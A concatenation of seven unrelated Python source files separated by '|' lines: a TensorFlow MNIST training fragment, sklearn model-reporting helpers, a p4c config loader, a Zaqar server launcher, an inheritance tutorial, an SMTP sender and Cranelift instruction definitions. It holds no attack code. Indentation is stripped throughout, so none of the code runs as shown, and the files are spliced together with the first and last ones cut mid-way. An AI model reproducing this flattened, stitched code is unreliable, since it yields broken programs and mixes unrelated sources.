h_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
W_fc1 = weight_variable([7*7*64,1024])
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1) + b_fc1)
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
prediction = tf.nn.softmax(tf.matmul(h_fc1_drop,W_fc2) + b_fc2)
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=prediction))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(51):
for batch in range(n_batch):
batch_xs,batch_ys = mnist.train.next_batch(batch_size)
sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys,keep_prob:0.8})
test_acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels,keep_prob:1.0})
print "Iter " + str(epoch) + ", Testing Accuracy= " + str(test_acc)
|
# import packages
import matplotlib; matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from sklearn.feature_selection import chi2
from sklearn.metrics import roc_auc_score, roc_curve, auc, precision_score, f1_score, mean_squared_error, accuracy_score
# report coefficients
def coef(model, X, X_train, y_train):
df_coef = pd.DataFrame(list(zip(X.columns, np.transpose(model.coef_))))
score, pvalues = chi2(X_train, y_train)
df_coef['p-value'] = pd.DataFrame(list(zip(np.transpose(pvalues))))
df_coef = df_coef.rename(columns = {0:'feature', 1:'coefficient'})
df_coef['coefficient'] = df_coef['coefficient'].str[0]
# intercept
df_intercept = pd.DataFrame(data=model.intercept_,
index=[0],
columns=['coefficient'])
df_intercept['feature'] = 'Intercept'
df_intercept = df_intercept[['feature', 'coefficient']]
df_coef.update(df_intercept)
df_coef['intercept'] = df_coef.iloc[0,1]
df_coef = df_coef[df_coef['feature'] != 'Intercept']
df_coef['log_odds'] = df_coef['intercept'] + df_coef['coefficient']
df_coef['odds'] = np.exp(df_coef['log_odds'])
df_coef['probability'] = df_coef['odds'] / (1 + df_coef['odds'])
df_coef.sort_values('probability', ascending=False, inplace=True)
return df_coef
# report predictions
def pred(model, X, y, df_offenses):
df_pred = X
df_pred['predicted'] = model.predict(X)
df_pred['actual'] = y
df_pred['spn'] = df_offenses['SPN']
return df_pred
# report accuracy
def accuracy(model, X_test, y_test):
accuracy_model = model.score(X_test, y_test)
accuracy_baseline = 1-y_test.mean()
accuracy_change = accuracy_model - accuracy_baseline
df_accuracy = pd.DataFrame({'Baseline Accuracy': [accuracy_baseline],
'Model Accuracy': [accuracy_model],
'Change in Accuracy': [accuracy_change]})
df_accuracy['Baseline Accuracy'] = round(df_accuracy['Baseline Accuracy'],2)
df_accuracy['Model Accuracy'] = round(df_accuracy['Model Accuracy'],2)
df_accuracy['Change in Accuracy'] = round(df_accuracy['Change in Accuracy'],2)
# ROC
y_true = y_test
y_pred = model.predict(X_test)
df_accuracy['roc_auc_score'] = round(
roc_auc_score(y_true, y_pred)
,2)
fpr, tpr, threshold = roc_curve(y_true, y_pred)
roc_auc = auc(fpr, tpr)
plt.title('Receiver Operating Characteristic')
plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)
plt.legend(loc = 'lower right')
plt.plot([0, 1], [0, 1],'r--')
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.savefig('plot_roc.png')
# precision score
df_accuracy['precision_score'] = round(
precision_score(y_true, y_pred)
,2)
# f1 score
df_accuracy['f1_score'] = round(
f1_score(y_true, y_pred)
,2)
# mean squared error
df_accuracy['mean_squared_error'] = round(
mean_squared_error(y_true, y_pred)
,2)
# accuracy score
df_accuracy['accuracy_score'] = round(
accuracy_score(y_true, y_pred)
,2)
return df_accuracy
|
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import sys
import os
class Config(object):
"""
Config - Configuration data for a 'p4c' tool chain.
The common configuration includes the argument parser and the path to the
backend configuration file.
"""
def __init__(self, config_prefix):
self.config_prefix = config_prefix or 'p4c'
self.target = []
def load_from_config(self, path, argParser):
cfg_globals = dict(globals())
cfg_globals['config'] = self
cfg_globals['__file__'] = path
cfg_globals['argParser'] = argParser
data = None
f = open(path)
try:
data = f.read()
except:
print "error", path
f.close()
try:
exec(compile(data, path, 'exec'), cfg_globals, None)
except SystemExit:
e = sys.exc_info()[1]
if e.args:
raise
except:
import traceback
print traceback.format_exc()
|
# Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from oslo_config import cfg
from oslo_log import log
from oslo_reports import guru_meditation_report as gmr
from oslo_reports import opts as gmr_opts
from zaqar import bootstrap
from zaqar.common import cli
from zaqar.conf import default
from zaqar import version
# NOTE(eggmaster): define command line options for zaqar-server
_CLI_OPTIONS = (
default.admin_mode,
cfg.BoolOpt('daemon', default=False,
help='Run Zaqar server in the background.'),
)
@cli.runnable
def run():
# Use the global CONF instance
conf = cfg.CONF
gmr_opts.set_defaults(conf)
# NOTE(eggmaster): register command line options for zaqar-server
conf.register_cli_opts(_CLI_OPTIONS)
log.register_options(conf)
# NOTE(jeffrey4l): Overwrite the default vaule for
# logging_context_format_string. Add project_id into it.
conf.set_default('logging_context_format_string',
'%(asctime)s.%(msecs)03d %(process)d %(levelname)s'
' %(name)s [%(request_id)s %(user_identity)s]'
' [project_id:%(project_id)s] %(message)s')
conf(project='zaqar', prog='zaqar-server')
log.setup(conf, 'zaqar')
gmr.TextGuruMeditation.setup_autorun(version, conf=conf)
server = bootstrap.Bootstrap(conf)
# The following code is to daemonize zaqar-server to avoid
# an issue with wsgiref writing to stdout/stderr when we don't
# want it to. This is specifically needed to allow zaqar to
# run under devstack, but it may also be useful for other scenarios.
# Open /dev/zero and /dev/null for redirection.
# Daemonizing zaqar-server is needed *just* when running under devstack
# and when zaqar is invoked with `daemon` command line option.
if conf.daemon:
zerofd = os.open('/dev/zero', os.O_RDONLY)
nullfd = os.open('/dev/null', os.O_WRONLY)
# Close the stdthings and reassociate them with a non terminal
os.dup2(zerofd, 0)
os.dup2(nullfd, 1)
os.dup2(nullfd, 2)
# Detach process context, this requires 2 forks.
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
os._exit(1)
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
os._exit(2)
server.run()
|
# Created by PyCharm Pro Edition
# User: Kaushik Talukdar
# Date: 24-04-17
# Time: 12:29 AM
# INHERITANCE
# We can create a new class, but instead of writing it from scratch, we can base it on an existing class.
# Lets understand inheritance better with an example
class Car():
def __init__(self, make, model, year):
self.make = make
self.model = model
self.year = year
self.mileage = 0
def get_descriptive_name(self):
full_name = self.make.title() + ' ' + self.model.title() + ' ' + str(self.year)
return full_name
def update_odometer(self, mileage):
self.mileage = mileage
# the class below is an inherited class derived from Cars and have access to Car's variables as well as methods
# The parent class name must appear in parenthesis in child class for Inheritance to work
# the super() method is responsible for providing the child class with all the variables and methods of parent class
class ElectricCar(Car):
def __init__(self, make, model, year):
super().__init__(make, model, year)
my_car = ElectricCar('Tesla', 'Model S', '2017')
car = my_car.get_descriptive_name()
print(car)
|
import config
import smtplib
from contextlib import contextmanager
@contextmanager
def smtp_server():
server = smtplib.SMTP(config.lookup("smtp.server"))
def activate_tls():
server.starttls()
security = config.lookup("smtp.security")
if security:
{
"tls": activate_tls,
}[security]()
username = config.lookup("smtp.username")
password = config.lookup("smtp.password")
server.login(username, password)
yield server
server.quit()
def has_email_headers(message, require=("Subject")):
lines = message.splitlines()
try:
header_terminator_index = lines.index("")
except ValueError:
return False
headers = lines[:header_terminator_index]
unmet = set(require)
for header in headers:
if ":" not in header:
return False
next_unmet = set()
for req in unmet:
if req not in header:
next_unmet.add(req)
unmet = next_unmet
return not unmet
def format_email_headers(headers):
return "".join(["{}: {}\n".format(k,v) for k, v in headers.items()])
def emailify(message):
if has_email_headers(message):
return message
first_line = message.splitlines()[0]
subject = first_line[:60]
if subject != first_line:
subject += "..."
headers = {
"Subject": subject
}
return "\n".join([format_email_headers(headers), message])
def send_message(message, recipient="default"):
target = config.lookup(["recipients", recipient, "email"])
sender = config.lookup("smtp.from") or config.lookup("smtp.username")
message = emailify(message)
with smtp_server() as server:
server.sendmail(sender, target, message)
if __name__ == '__main__':
import sample
sample.send_sample_message(send_message)
|
"""
Cranelift base instruction set.
This module defines the basic Cranelift instruction set that all targets
support.
"""
from __future__ import absolute_import
from cdsl.operands import Operand, VARIABLE_ARGS
from cdsl.typevar import TypeVar
from cdsl.instructions import Instruction, InstructionGroup
from base.types import f32, f64, b1, iflags, fflags
from base.immediates import imm64, uimm8, uimm32, ieee32, ieee64, offset32
from base.immediates import boolean, intcc, floatcc, memflags, regunit
from base.immediates import trapcode
from base import entities
from cdsl.ti import WiderOrEq
import base.formats # noqa
GROUP = InstructionGroup("base", "Shared base instruction set")
Int = TypeVar('Int', 'A scalar or vector integer type', ints=True, simd=True)
Bool = TypeVar('Bool', 'A scalar or vector boolean type',
bools=True, simd=True)
iB = TypeVar('iB', 'A scalar integer type', ints=True)
iAddr = TypeVar('iAddr', 'An integer address type', ints=(32, 64))
Testable = TypeVar(
'Testable', 'A scalar boolean or integer type',
ints=True, bools=True)
TxN = TypeVar(
'TxN', 'A SIMD vector type',
ints=True, floats=True, bools=True, scalars=False, simd=True)
Any = TypeVar(
'Any', 'Any integer, float, or boolean scalar or vector type',
ints=True, floats=True, bools=True, scalars=True, simd=True)
Mem = TypeVar(
'Mem', 'Any type that can be stored in memory',
ints=True, floats=True, simd=True)
MemTo = TypeVar(
'MemTo', 'Any type that can be stored in memory',
ints=True, floats=True, simd=True)
addr = Operand('addr', iAddr)
#
# Control flow
#
c = Operand('c', Testable, doc='Controlling value to test')
Cond = Operand('Cond', intcc)
x = Operand('x', iB)
y = Operand('y', iB)
EBB = Operand('EBB', entities.ebb, doc='Destination extended basic block')
args = Operand('args', VARIABLE_ARGS, doc='EBB arguments')
jump = Instruction(
'jump', r"""
Jump.
Unconditionally jump to an extended basic block, passing the specified
EBB arguments. The number and types of arguments must match the
destination EBB.
""",
ins=(EBB, args), is_branch=True, is_terminator=True)
fallthrough = Instruction(
'fallthrough', r"""
Fall through to the next EBB.
This is the same as :inst:`jump`, except the destination EBB must be
the next one in the layout.
Jumps are turned into fall-through instructions by the branch
relaxation pass. There is no reason to use this instruction outside
that pass.
""",
ins=(EBB, args), is_branch=True, is_terminator=True)
brz = Instruction(
'brz', r"""
Branch when zero.
If ``c`` is a :type:`b1` value, take the branch when ``c`` is false. If
``c`` is an integer value, take the branch when ``c = 0``.
""",
ins=(c, EBB, args), is_branch=True)
brnz = Instruction(
'brnz', r"""
Branch when non-zero.
If ``c`` is a :type:`b1` value, take the branch when ``c`` is true. If
``c`` is an integer value, take the branch when ``c != 0``.
""",
ins=(c, EBB, args), is_branch=True)
br_icmp = Instruction(
'br_icmp', r"""
Compare scalar integers and branch.
Compare ``x`` and ``y`` in the same way as the :inst:`icmp` instruction
and take the branch if the condition is true::
br_icmp ugt v1, v2, ebb4(v5, v6)
is semantically equivalent to::
v10 = icmp ugt, v1, v2
brnz v10, ebb4(v5, v6)
Some RISC architectures like MIPS and RISC-V provide instructions that
implement all or some of the condition codes. The instruction can also
be used to represent *macro-op fusion* on architectures like Intel's.
""",
ins=(Cond, x, y, EBB, args), is_branch=True)
f = Operand('f', iflags)
brif = Instruction(
'brif', r"""
Branch when condition is true in integer CPU flags.
""",
ins=(Cond, f, EBB, args), is_branch=True)
Cond = Operand('Cond', floatcc)
f = Operand('f', fflags)
brff = Instruction(
'brff', r"""
Branch when condition is true in floating point CPU flags.
""",
ins=(Cond, f, EBB, args), is_branch=True)
x = Operand('x', iB, doc='index into jump table')
Entry = TypeVar('Entry', 'A scalar integer type', ints=True)
entry = Operand('entry', Entry, doc='entry of jump table')
JT = Operand('JT', entities.jump_table)
br_table = Instruction(
'br_table', r"""
Indirect branch via jump table.
Use ``x`` as an unsigned index into the jump table ``JT``. If a jump
table entry is found, branch to the corresponding EBB. If no entry was
found or the index is out-of-bounds, branch to the given default EBB.
Note that this branch instruction can't pass arguments to the targeted
blocks. Split critical edges as needed to work around this.
Do not confuse this with "tables" in WebAssembly. ``br_table`` is for
jump tables with destinations within the current function only -- think
of a ``match`` in Rust or a ``switch`` in C. If you want to call a
function in a dynamic library, that will typically use
``call_indirect``.
""",
ins=(x, EBB, JT), is_branch=True, is_terminator=True)
Size = Operand('Size', uimm8, 'Size in bytes')
jump_table_entry = Instruction(
'jump_table_entry', r"""
Get an entry from a jump table.
Load a serialized ``entry`` from a jump table ``JT`` at a given index
``addr`` with a specific ``Size``. The retrieved entry may need to be
decoded after loading, depending upon the jump table type used.
Currently, the only type supported is entries which are relative to the
base of the jump table.
""",
ins=(x, addr, Size, JT), outs=entry)
jump_table_base = Instruction(
'jump_table_base', r"""
Get the absolute base address of a jump table.
This is used for jump tables wherein the entries are stored relative to
the base of jump table. In order to use these, generated code should first
load an entry using ``jump_table_entry``, then use this instruction to add
the relative base back to it.
""",
ins=JT, outs=addr)
indirect_jump_table_br = Instruction(
'indirect_jump_table_br', r"""
Branch indirectly via a jump table entry.
Unconditionally jump via a jump table entry that was previously loaded
with the ``jump_table_entry`` instruction.
""",
ins=(addr, JT),
is_branch=True, is_indirect_branch=True, is_terminator=True)
debugtrap = Instruction('debugtrap', r"""
Encodes an assembly debug trap.
""", can_load=True, can_store=True, other_side_effects=True)
code = Operand('code', trapcode)
trap = Instruction(
'trap', r"""
Terminate execution unconditionally.
""",
ins=code, is_terminator=True, can_trap=True)
trapz = Instruction(
'trapz', r"""
Trap when zero.
if ``c`` is non-zero, execution continues at the following instruction.
""",
ins=(c, code), can_trap=True)
trapnz = Instruction(
'trapnz', r"""
Trap when non-zero.
if ``c`` is zero, execution continues at the following instruction.
""",
ins=(c, code), can_trap=True)
Cond = Operand('Cond', intcc)
f = Operand('f', iflags)
trapif = Instruction(
'trapif', r"""
Trap when condition is true in integer CPU flags.
""",
ins=(Cond, f, code), can_trap=True)
Cond = Operand('Cond', floatcc)
f = Operand('f', fflags)
trapff = Instruction(
'trapff', r"""
Trap when condition is true in floating point CPU flags.
""",
ins=(Cond, f, code), can_trap=True)
rvals = Operand('rvals', VARIABLE_ARGS, doc='return values')
x_return = Instruction(
'return', r"""
Return from the function.
Unconditionally transfer control to the calling function, passing the
provided return values. The list of return values must match the
function signature's return types.
""",
ins=rvals, is_return=True, is_terminator=True)
fallthrough_return = Instruction(
'fallthrough_return', r"""
Return from the function by fallthrough.
This is a specialized instruction for use where one wants to append
a custom epilogue, which will then perform the real return. This
instruction has no encoding.
""",
ins=rvals, is_return=True, is_terminator=True)
FN = Operand(
'FN',
entities.func_ref,
doc='function to call, declared by :inst:`function`')
args = Operand('args', VARIABLE_ARGS, doc='call arguments')
call = Instruction(
'call', r"""
Direct function call.
Call a function which has been declared in the preamble. The argument
types must match the function's signature.
""",
ins=(FN, args), outs=rvals, is_call=True)
SIG = Operand('SIG', entities.sig_ref, doc='function signature')
callee = Operand('callee', iAddr, doc='address of function to call')
call_indirect = Instruction(
'call_indirect', r"""
Indirect function call.
Call the function pointed to by `callee` with the given arguments. The
called function must match the specified signature.
Note that this is different from WebAssembly's ``call_indirect``; the
callee is a native address, rather than a table index. For WebAssembly,
:inst:`table_addr` and :inst:`load` are used to obtain a native address
from a table.
""",
ins=(SIG, callee, args), outs=rvals, is_call=True)
func_addr = Instruction(
'func_addr', r"""
Get the address of a function.
Compute the absolute address of a function declared in the preamble.
The returned address can be used as a ``callee`` argument to
:inst:`call_indirect`. This is also a method for calling functions that
are too far away to be addressable by a direct :inst:`call`
instruction.
""",
ins=FN, outs=addr)
#
# Memory operations
#
SS = Operand('SS', entities.stack_slot)
Offset = Operand('Offset', offset32, 'Byte offset from base address')
x = Operand('x', Mem, doc='Value to be stored')
a = Operand('a', Mem, doc='Value loaded')
p = Operand('p', iAddr)
MemFlags = Operand('MemFlags', memflags)
args = Operand('args', VARIABLE_ARGS, doc='Address arguments')
load = Instruction(
'load', r"""
Load from memory at ``p + Offset``.
This is a polymorphic instruction that can load any value type which
has a memory representation.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
load_complex = Instruction(
'load_complex', r"""
Load from memory at ``sum(args) + Offset``.
This is a polymorphic instruction that can load any value type which
has a memory representation.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
store = Instruction(
'store', r"""
Store ``x`` to memory at ``p + Offset``.
This is a polymorphic instruction that can store any value type with a
memory representation.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
store_complex = Instruction(
'store_complex', r"""
Store ``x`` to memory at ``sum(args) + Offset``.
This is a polymorphic instruction that can store any value type with a
memory representation.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
iExt8 = TypeVar(
'iExt8', 'An integer type with more than 8 bits',
ints=(16, 64))
x = Operand('x', iExt8)
a = Operand('a', iExt8)
uload8 = Instruction(
'uload8', r"""
Load 8 bits from memory at ``p + Offset`` and zero-extend.
This is equivalent to ``load.i8`` followed by ``uextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
uload8_complex = Instruction(
'uload8_complex', r"""
Load 8 bits from memory at ``sum(args) + Offset`` and zero-extend.
This is equivalent to ``load.i8`` followed by ``uextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
sload8 = Instruction(
'sload8', r"""
Load 8 bits from memory at ``p + Offset`` and sign-extend.
This is equivalent to ``load.i8`` followed by ``sextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
sload8_complex = Instruction(
'sload8_complex', r"""
Load 8 bits from memory at ``sum(args) + Offset`` and sign-extend.
This is equivalent to ``load.i8`` followed by ``sextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
istore8 = Instruction(
'istore8', r"""
Store the low 8 bits of ``x`` to memory at ``p + Offset``.
This is equivalent to ``ireduce.i8`` followed by ``store.i8``.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
istore8_complex = Instruction(
'istore8_complex', r"""
Store the low 8 bits of ``x`` to memory at ``sum(args) + Offset``.
This is equivalent to ``ireduce.i8`` followed by ``store.i8``.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
iExt16 = TypeVar(
'iExt16', 'An integer type with more than 16 bits',
ints=(32, 64))
x = Operand('x', iExt16)
a = Operand('a', iExt16)
uload16 = Instruction(
'uload16', r"""
Load 16 bits from memory at ``p + Offset`` and zero-extend.
This is equivalent to ``load.i16`` followed by ``uextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
uload16_complex = Instruction(
'uload16_complex', r"""
Load 16 bits from memory at ``sum(args) + Offset`` and zero-extend.
This is equivalent to ``load.i16`` followed by ``uextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
sload16 = Instruction(
'sload16', r"""
Load 16 bits from memory at ``p + Offset`` and sign-extend.
This is equivalent to ``load.i16`` followed by ``sextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
sload16_complex = Instruction(
'sload16_complex', r"""
Load 16 bits from memory at ``sum(args) + Offset`` and sign-extend.
This is equivalent to ``load.i16`` followed by ``sextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
istore16 = Instruction(
'istore16', r"""
Store the low 16 bits of ``x`` to memory at ``p + Offset``.
This is equivalent to ``ireduce.i16`` followed by ``store.i16``.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
istore16_complex = Instruction(
'istore16_complex', r"""
Store the low 16 bits of ``x`` to memory at ``sum(args) + Offset``.
This is equivalent to ``ireduce.i16`` followed by ``store.i16``.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
iExt32 = TypeVar(
'iExt32', 'An integer type with more than 32 bits',
ints=(64, 64))
x = Operand('x', iExt32)
a = Operand('a', iExt32)
uload32 = Instruction(
'uload32', r"""
Load 32 bits from memory at ``p + Offset`` and zero-extend.
This is equivalent to ``load.i32`` followed by ``uextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
uload32_complex = Instruction(
'uload32_complex', r"""
Load 32 bits from memory at ``sum(args) + Offset`` and zero-extend.
This is equivalent to ``load.i32`` followed by ``uextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
sload32 = Instruction(
'sload32', r"""
Load 32 bits from memory at ``p + Offset`` and sign-extend.
This is equivalent to ``load.i32`` followed by ``sextend``.
""",
ins=(MemFlags, p, Offset), outs=a, can_load=True)
sload32_complex = Instruction(
'sload32_complex', r"""
Load 32 bits from memory at ``sum(args) + Offset`` and sign-extend.
This is equivalent to ``load.i32`` followed by ``sextend``.
""",
ins=(MemFlags, args, Offset), outs=a, can_load=True)
istore32 = Instruction(
'istore32', r"""
Store the low 32 bits of ``x`` to memory at ``p + Offset``.
This is equivalent to ``ireduce.i32`` followed by ``store.i32``.
""",
ins=(MemFlags, x, p, Offset), can_store=True)
istore32_complex = Instruction(
'istore32_complex', r"""
Store the low 32 bits of ``x`` to memory at ``sum(args) + Offset``.
This is equivalent to ``ireduce.i32`` followed by ``store.i32``.
""",
ins=(MemFlags, x, args, Offset), can_store=True)
x = Operand('x', Mem, doc='Value to be stored')
a = Operand('a', Mem, doc='Value loaded')
Offset = Operand('Offset', offset32, 'In-bounds offset into stack slot')
stack_load = Instruction(
'stack_load', r"""
Load a value from a stack slot at the constant offset.
This is a polymorphic instruction that can load any value type which
has a memory representation.
The offset is an immediate constant, not an SSA value. The memory
access cannot go out of bounds, i.e.
:math:`sizeof(a) + Offset <= sizeof(SS)`.
""",
ins=(SS, Offset), outs=a, can_load=True)
stack_store = Instruction(
'stack_store', r"""
Store a value to a stack slot at a constant offset.
This is a polymorphic instruction that can store any value type with a
memory representation.
The offset is an immediate constant, not an SSA value. The memory
access cannot go out of bounds, i.e.
:math:`sizeof(a) + Offset <= sizeof(SS)`.
""",
ins=(x, SS, Offset), can_store=True)
stack_addr = Instruction(
'stack_addr', r"""
Get the address of a stack slot.
Compute the absolute address of a byte in a stack slot. The offset must
refer to a byte inside the stack slot:
:math:`0 <= Offset < sizeof(SS)`.
""",
ins=(SS, Offset), outs=addr)
#
# Global values.
#
GV = Operand('GV', entities.global_value)
global_value = Instruction(
'global_value', r"""
Compute the value of global GV.
""",
ins=GV, outs=a)
# A specialized form of global_value instructions that only handles
# symbolic names.
symbol_value = Instruction(
'symbol_value', r"""
Compute the value of global GV, which is a symbolic value.
""",
ins=GV, outs=a)
#
# WebAssembly bounds-checked heap accesses.
#
HeapOffset = TypeVar('HeapOffset', 'An unsigned heap offset', ints=(32, 64))
H = Operand('H', entities.heap)
p = Operand('p', HeapOffset)
Size = Operand('Size', uimm32, 'Size in bytes')
heap_addr = Instruction(
'heap_addr', r"""
Bounds check and compute absolute address of heap memory.
Verify that the offset range ``p .. p + Size - 1`` is in bounds for the
heap H, and generate an absolute address that is safe to dereference.
1. If ``p + Size`` is not greater than the heap bound, return an
absolute address corresponding to a byte offset of ``p`` from the
heap's base address.
2. If ``p + Size`` is greater than the heap bound, generate a trap.
""",
ins=(H, p, Size), outs=addr)
#
# WebAssembly bounds-checked table accesses.
#
TableOffset = TypeVar('TableOffset', 'An unsigned table offset', ints=(32, 64))
T = Operand('T', entities.table)
p = Operand('p', TableOffset)
Offset = Operand('Offset', offset32, 'Byte offset from element address')
table_addr = Instruction(
'table_addr', r"""
Bounds check and compute absolute address of a table entry.
Verify that the offset ``p`` is in bounds for the table T, and generate
an absolute address that is safe to dereference.
``Offset`` must be less than the size of a table element.
1. If ``p`` is not greater than the table bound, return an absolute
address corresponding to a byte offset of ``p`` from the table's
base address.
2. If ``p`` is greater than the table bound, generate a trap.
""",
ins=(T, p, Offset), outs=addr)
#
# Materializing constants.
#
N = Operand('N', imm64)
a = Operand('a', Int, doc='A constant integer scalar or vector value')
iconst = Instruction(
'iconst', r"""
Integer constant.
Create a scalar integer SSA value with an immediate constant value, or
an integer vector where all the lanes have the same value.
""",
ins=N, outs=a)
N = Operand('N', ieee32)
a = Operand('a', f32, doc='A constant f32 scalar value')
f32const = Instruction(
'f32const', r"""
Floating point constant.
Create a :type:`f32` SSA value with an immediate constant value.
""",
ins=N, outs=a)
N = Operand('N', ieee64)
a = Operand('a', f64, doc='A constant f64 scalar value')
f64const = Instruction(
'f64const', r"""
Floating point constant.
Create a :type:`f64` SSA value with an immediate constant value.
""",
ins=N, outs=a)
N = Operand('N', boolean)
a = Operand('a', Bool, doc='A constant boolean scalar or vector value')
bconst = Instruction(
'bconst', r"""
Boolean constant.
Create a scalar boolean SSA value with an immediate constant value, or
a boolean vector where all the lanes have the same value.
""",
ins=N, outs=a)
#
# Generics.
#
nop = Instruction(
'nop', r"""
Just a dummy instruction
Note: this doesn't compile to a machine code nop
""")
c = Operand('c', Testable, doc='Controlling value to test')
x = Operand('x', Any, doc='Value to use when `c` is true')
y = Operand('y', Any, doc='Value to use when `c` is false')
a = Operand('a', Any)
select = Instruction(
'select', r"""
Conditional select.
This instruction selects whole values. Use :inst:`vselect` for
lane-wise selection.
""",
ins=(c, x, y), outs=a)
cc = Operand('cc', intcc, doc='Controlling condition code')
flags = Operand('flags', iflags, doc='The machine\'s flag register')
selectif = Instruction(
'selectif', r"""
Conditional select, dependent on integer condition codes.
""",
ins=(cc, flags, x, y), outs=a)
x = Operand('x', Any)
copy = Instruction(
'copy', r"""
Register-register copy.
This instruction copies its input, preserving the value type.
A pure SSA-form program does not need to copy values, but this
instruction is useful for representing intermediate stages during
instruction transformations, and the register allocator needs a way of
representing register copies.
""",
ins=x, outs=a)
spill = Instruction(
'spill', r"""
Spill a register value to a stack slot.
This instruction behaves exactly like :inst:`copy`, but the result
value is assigned to a spill slot.
""",
ins=x, outs=a, can_store=True)
fill = Instruction(
'fill', r"""
Load a register value from a stack slot.
This instruction behaves exactly like :inst:`copy`, but creates a new
SSA value for the spilled input value.
""",
ins=x, outs=a, can_load=True)
src = Operand('src', regunit)
dst = Operand('dst', regunit)
regmove = Instruction(
'regmove', r"""
Temporarily divert ``x`` from ``src`` to ``dst``.
This instruction moves the location of a value from one register to
another without creating a new SSA value. It is used by the register
allocator to temporarily rearrange register assignments in order to
satisfy instruction constraints.
The register diversions created by this instruction must be undone
before the value leaves the EBB. At the entry to a new EBB, all live
values must be in their originally assigned registers.
""",
ins=(x, src, dst),
other_side_effects=True)
copy_special = Instruction(
'copy_special', r"""
Copies the contents of ''src'' register to ''dst'' register.
This instructions copies the contents of one register to another
register without involving any SSA values. This is used for copying
special registers, e.g. copying the stack register to the frame
register in a function prologue.
""",
ins=(src, dst),
other_side_effects=True)
delta = Operand('delta', Int)
adjust_sp_down = Instruction(
'adjust_sp_down', r"""
Subtracts ``delta`` offset value from the stack pointer register.
This instruction is used to adjust the stack pointer by a dynamic amount.
""",
ins=(delta,),
other_side_effects=True)
StackOffset = Operand('Offset', imm64, 'Offset from current stack pointer')
adjust_sp_up_imm = Instruction(
'adjust_sp_up_imm', r"""
Adds ``Offset`` immediate offset value to the stack pointer register.
This instruction is used to adjust the stack pointer, primarily in function
prologues and epilogues. ``Offset`` is constrained to the size of a signed
32-bit integer.
""",
ins=(StackOffset,),
other_side_effects=True)
StackOffset = Operand('Offset', imm64, 'Offset from current stack pointer')
adjust_sp_down_imm = Instruction(
'adjust_sp_down_imm', r"""
Subtracts ``Offset`` immediate offset value from the stack pointer
register.
This instruction is used to adjust the stack pointer, primarily in function
prologues and epilogues. ``Offset`` is constrained to the size of a signed
32-bit integer.
""",
ins=(StackOffset,),
other_side_effects=True)
f = Operand('f', iflags)
ifcmp_sp = Instruction(
'ifcmp_sp', r"""
Compare ``addr`` with the stack pointer and set the CPU flags.
This is like :inst:`ifcmp` where ``addr`` is the LHS operand and the stack
pointer is the RHS.
""",
ins=addr, outs=f)
regspill = Instruction(
'regspill', r"""
Temporarily divert ``x`` from ``src`` to ``SS``.
This instruction moves the location of a value from a register to a
stack slot without creating a new SSA value. It is used by the register
allocator to temporarily rearrange register assignments in order to
satisfy instruction constraints.
See also :inst:`regmove`.
""",
ins=(x, src, SS),
other_side_effects=True)
regfill = Instruction(
'regfill', r"""
Temporarily divert ``x`` from ``SS`` to ``dst``.
This instruction moves the location of a value from a stack slot to a
register without creating a new SSA value. It is used by the register
allocator to temporarily rearrange register assignments in order to
satisfy instruction constraints.
See also :inst:`regmove`.
""",
ins=(x, SS, dst),
other_side_effects=True)
#
# Vector operations
#
x = Operand('x', TxN, doc='Vector to split')
